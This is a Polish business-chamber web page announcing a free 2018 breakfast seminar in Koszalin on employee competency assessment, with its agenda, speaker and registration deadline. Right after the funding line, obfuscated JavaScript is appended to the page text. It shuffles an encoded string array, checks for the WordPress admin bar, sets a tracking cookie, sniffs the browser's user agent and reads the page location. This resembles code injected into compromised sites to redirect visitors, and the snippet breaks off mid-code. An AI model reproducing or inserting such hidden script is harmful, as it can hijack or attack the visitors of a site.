ŚNIADANIE BIZNESOWE „Badanie Kompetencji Pracowników – nowoczesne zarządzanie zasobami ludzkimi. | Północna Izba Gospodarcza w Koszalinie

Zapraszamy-na-szkolenie

Szanowni Państwo,

Centrum Biznesu Fundacji CIP w Koszalinie ma przyjemność zaprosić na ŚNIADANIE BIZNESOWE „Badanie Kompetencji Pracowników – nowoczesne zarządzanie zasobami ludzkimi. Jak pracodawca może zdobyć wiedzę o kompetencjach pracowników i jak może ją wykorzystać?”, które odbędzie się 24 maja 2018r. (czwartek), w godz. 10:00 – 12:00 w City Box, Rynek Staromiejski 14 w Koszalinie.

Podczas spotkania omówione zostaną m.in. takie zagadnienia jak:

 • Poznanie poziomu kompetencji zawodowych kandydatów do pracy oraz już zatrudnianych pracowników dzięki Narzędziu do Badania Kompetencji

 • Możliwość określenia poziomu posiadanych przez pracownika lub kandydata do pracy:

  • kompetencji osobistych, np. podzielności uwagi, radzenia sobie ze stresem czy kreatywności

  • kompetencji społecznych, np. negocjowania, orientacji na klienta

  • kompetencji menadżerskich, np. zarządzanie pracą innych osób, rozwiązywanie konfliktów

 • Wykorzystanie pomiaru i analizy poziomu kompetencji w:
  • Rekrutacjach i ocenach okresowych
  • Określaniu obecnych i przyszłych potrzeb szkoleniowych pracowników
  • Decyzjach o awansach, zmianach stanowisk przy restrukturyzacjach
  • Programach rozwoju menedżerów i talentów

Prelegent:

Ewa Królikowska,

Wojewódzki Urząd Pracy w Szczecinie, Wydział Poradnictwa Zawodowego, Biuro Centrum Informacji i Planowania Kariery Zawodowej w Koszalinie

 

UDZIAŁ W SPOTKANIU JEST BEZPŁATNY TYLKO PO UPRZEDNIM POTWIERDZENIU UCZESTNICTWA do dnia 22 maja br. Formularz zgłoszeniowy POTWIERDZENIE UDZIAŁU 24.5.2018

 

dofinansowano z budżetu Gminy Miasta Koszalina 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m